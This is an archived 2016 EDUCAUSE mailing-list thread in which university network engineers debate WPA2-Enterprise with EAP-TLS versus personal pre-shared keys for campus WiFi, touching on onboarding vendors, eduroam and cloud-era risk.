Jeff, I agree with you. My ultimate model would be even open WiFi everywhere with bullet proof applications and a set bandwidth per user (and locations agreeing on IP roaming).
While I'm writing this I'm waiting for my son at a free public electric car charging station. Out of 6 parking places one is taken by an electric car and all others are non-electric cars using the slots because it is close to the sport facility Enforcement is no where to be seen (quite amazing BTW on a campus ;-). Human nature! Network engineers need and like a few control knobs to control chaos. MAC addresses do not seem to be enough anymore. At the moment WPA2-enterprise seems to fit a certain need and as EAP-TLS becomes better supported in OSes many of us have bitten the PKI bullet without too much pain. I see EAP-TLS as a soft SIM card for Wifi. Very powerful and unlike a SIM card, it doesn't need to be controlled by a specific provider. Philippe www.eduroam.us > On Nov 1, 2016, at 6:31 PM, Jeffrey D. Sessler <j...@scrippscollege.edu> > wrote: > > I think the distinction between enterprise and residential blurred with the > advent of SaaS and the cloud. No longer did an employee need to be “at the > office” to enter their hours worked in the time and attendance system, or as > an administrator, you no longer had to run the accounting application from > your office computer. It’s difficult for me to name anything we’re doing here > now that isn’t some form of web-based SaaS model, where the expectation is > that an employee (baring overtime rules) can access these systems from any > location. If an employee can access these systems from Starbucks for the 16 > hours a day they aren’t at work, what’s the point of WPA2-ent for the other > 8? > > I’m of the mindset that WAP2-Enterprise may in fact be an endangered species. > I think most will come to accept that something like PPSK is “good enough”. > Users don’t want significant barriers to getting access to what they need, > and once those barriers reach a certain level, the user will absolutely find > alternatives i.e. I’ve visited many colleges where it was easier to use my > MiFi hotspot then to be forced thru a cumbersome on-boarding system where > there are restrictions be it on services available or data rates. > > Taken to the extreme. At the point you no longer have a local data center and > everything is SaaS, can an argument for WPA2-ent still be made? > > Jeff > > On 11/1/16, 3:03 PM, "The EDUCAUSE Wireless Issues Constituent Group Listserv > on behalf of Curtis K. Larsen" <WIRELESS-LAN@LISTSERV.EDUCAUSE.EDU on behalf > of curtis.k.lar...@utah.edu> wrote: > > Well, I think users in general expect that when they connect to the > "Secure" wireless network - it is both encrypted, and they are not being > impersonated. If not, maybe you could allow them to opt-out after accepting > the risk. Often these are the same credentials that staff use to login and > set the direct deposit for their paycheck, credentials faculty use to post > grades, and students use to add/drop classes. The business could also > opt-out if they are willing to accept the risk. But as the Enterprise > Wireless Engineer you should at least make everyone aware that with PPSK > there are still risks. Also, I just think one of these standards was > intended to be mostly for residential purposes and the other for mostly > enterprise purposes. When you look at federated authentication as in eduroam > or hotspot 2.0, etc. WPA2-Ent. just seems to fit better long-term. In short, > I think the difficult/expensive parts of PKI/EAP-TLS have recently become a > lot easier and I think they'll continue to do so. > > -Curtis > > ________________________________________ > From: The EDUCAUSE Wireless Issues Constituent Group Listserv > <WIRELESS-LAN@LISTSERV.EDUCAUSE.EDU> on behalf of Chuck Enfield > <chu...@psu.edu> > Sent: Tuesday, November 1, 2016 2:54 PM > To: WIRELESS-LAN@LISTSERV.EDUCAUSE.EDU > Subject: Re: [WIRELESS-LAN] TLS Onboarding Vendors > > "If we can agree that most applications today (including ones that involve > FERPA or PII) are web-based (let’s toss in cloud too), and a user can > access > them from any location including at home on a PSK protected SSID (or > cellular connection, or open network at Starbucks), does forcing WPA2-Ent > at > the campus actually result in reduced risk? Is there cost justification > for > the infrastructure (staff, hardware, software) necessary to implement > EAP-TLS (or alternatives)?" > > Where's the like button? FWIW, I still like enterprise encryption and > authentication for keeping people off of my network. I's nevertheless > useful to remind ourselves of precisely what the value is, and it's not > protecting the data. > > Chuck > > -----Original Message----- > From: The EDUCAUSE Wireless Issues Constituent Group Listserv > [mailto:WIRELESS-LAN@LISTSERV.EDUCAUSE.EDU] On Behalf Of Jeffrey D. Sessler > Sent: Tuesday, November 01, 2016 4:41 PM > To: WIRELESS-LAN@LISTSERV.EDUCAUSE.EDU > Subject: Re: [WIRELESS-LAN] TLS Onboarding Vendors > > Curtis, > > If we can agree that most applications today (including ones that involve > FERPA or PII) are web-based (let’s toss in cloud too), and a user can > access > them from any location including at home on a PSK protected SSID (or > cellular connection, or open network at Starbucks), does forcing WPA2-Ent > at > the campus actually result in reduced risk? Is there cost justification > for > the infrastructure (staff, hardware, software) necessary to implement > EAP-TLS (or alternatives)? > > Our Admissions process starts with getting Common App (filled out by > student/parents at home on a website and includes a lot of sensitive info), > that data feeds into Slate (another cloud-based Admissions package), then > feeds into financial-aid and the SiS (again web-based for the users). The > bulk of the PII/FERPA items have then been collected outside of the college > envirnoment, from connections that may have Starbucks level of protection. > I’m > trying to see the justification of WPA2-Ent, but it’s a hard sell – sure, I > know there can be advantages, but are they necessary and/or justified? Is > PPSK good enough for everyone. Is it good enough for students and their > devices? > > Jeff > > On 11/1/16, 8:56 AM, "The EDUCAUSE Wireless Issues Constituent Group > Listserv on behalf of Curtis K. Larsen" <WIRELESS-LAN@LISTSERV.EDUCAUSE.EDU > on behalf of curtis.k.lar...@utah.edu> wrote: > > I personally would *not* prefer PPSK for devices that are WPA2-Ent. > (EAP-TLS) capable. PPSK has a nice niche in the IoT device category for > devices that do not support WPA2-Ent. (EAP-TLS) in my opinion, and we'll be > anxious to use it there when our vendor delivers ...but the same > vulnerabilities around a regular WPA2-PSK are still there (de-auths, brute > forcing). So, for IoT in student housing (game consoles, and roku devices > that only do PSK) maybe PPSK is the appropriate new level of security > because sensitive data is unlikely, but for the most common devices (Phone, > Laptop, Tablet, etc.) where users are more likely to access and transmit > FERPA, PHI, etc. WPA2-Enterprise with EAP-TLS seems more appropriate. From > what I can tell it is probably easier to implement EAP-TLS than PPSK > amongst > the fully-managed portion of that device class anyway (thinking GPO here). > In my ideal world I would have 3 SSID's One Guest SSID unencrypted, One > PPSK SSID that accommodates all of the non-dot1x capable devices that are > not guest users, and one dot1x WPA2-Ent (EAP-TLS) SSID for traditional > Student/Faculty/Staff devices (Phone, Laptop, Tablet). Then someday in the > future Hotspot 2.0/802.11u would convert many of the un-encrypted guests > over to encrypted without any captive portal interaction. > > > -- > Curtis K. Larsen > Senior Network Engineer > University of Utah IT/CIS > > ________________________________________ > From: The EDUCAUSE Wireless Issues Constituent Group Listserv > <WIRELESS-LAN@LISTSERV.EDUCAUSE.EDU> on behalf of Coehoorn, Joel > <jcoeho...@york.edu> > Sent: Tuesday, November 1, 2016 8:33 AM > To: WIRELESS-LAN@LISTSERV.EDUCAUSE.EDU > Subject: Re: [WIRELESS-LAN] TLS Onboarding Vendors > >> If those using or considering TLS had the option of PPSK (personal > pre-shared key), would you opt for PPSK instead? > > Definitely. I think it's a much more user-friendly option, while > providing similar control and security as TLS. > > > > > [http://www.york.edu/Portals/0/Images/Logo/YorkCollegeLogoSmall.jpg] > > > Joel Coehoorn > Director of Information Technology > 402.363.5603 > jcoeho...@york.edu<mailto:jcoeho...@york.edu> > > > > > The mission of York College is to transform lives through > Christ-centered education and to equip students for lifelong service to > God, > family, and society > > On Tue, Nov 1, 2016 at 9:12 AM, Jeffrey D. Sessler > <j...@scrippscollege.edu<mailto:j...@scrippscollege.edu>> wrote: > Just curious. If those using or considering TLS had the option of PPSK > (personal pre-shared key), would you opt for PPSK instead? > > Jeff > > On 10/31/16, 9:27 AM, "The EDUCAUSE Wireless Issues Constituent Group > Listserv on behalf of Bruce Boardman" > > <WIRELESS-LAN@LISTSERV.EDUCAUSE.EDU<mailto:WIRELESS-LAN@LISTSERV.EDUCAUSE.EDU> > on behalf of board...@syr.edu<mailto:board...@syr.edu>> wrote: > > We are using Cloud Path for onboarding, but we are considering > other > options if and when we go to EAP TLS. We may get it baked in if we use ISE > or Clear Pass but I considering other standalone options as well. Anybody > have experience or thoughts they'd like to share. Thanks > > Bruce Boardman Networking Syracuse University 315 > 412-4156<tel:315%20412-4156> Skype > board...@syr.edu<mailto:board...@syr.edu> > > ********** > Participation and subscription information for this EDUCAUSE > Constituent Group discussion list can be found at > http://www.educause.edu/groups/. > > > > ********** > Participation and subscription information for this EDUCAUSE > Constituent > Group discussion list can be found at http://www.educause.edu/groups/. > > > ********** Participation and subscription information for this EDUCAUSE > Constituent Group discussion list can be found at > http://www.educause.edu/groups/. > > ********** > Participation and subscription information for this EDUCAUSE > Constituent > Group discussion list can be found at http://www.educause.edu/groups/. > > > > ********** > Participation and subscription information for this EDUCAUSE Constituent > Group discussion list can be found at http://www.educause.edu/groups/. > > ********** > Participation and subscription information for this EDUCAUSE Constituent > Group discussion list can be found at http://www.educause.edu/groups/. > > ********** > Participation and subscription information for this EDUCAUSE Constituent > Group discussion list can be found at http://www.educause.edu/groups/. > > > > ********** > Participation and subscription information for this EDUCAUSE Constituent > Group discussion list can be found at http://www.educause.edu/groups/. > ********** Participation and subscription information for this EDUCAUSE Constituent Group discussion list can be found at http://www.educause.edu/groups/.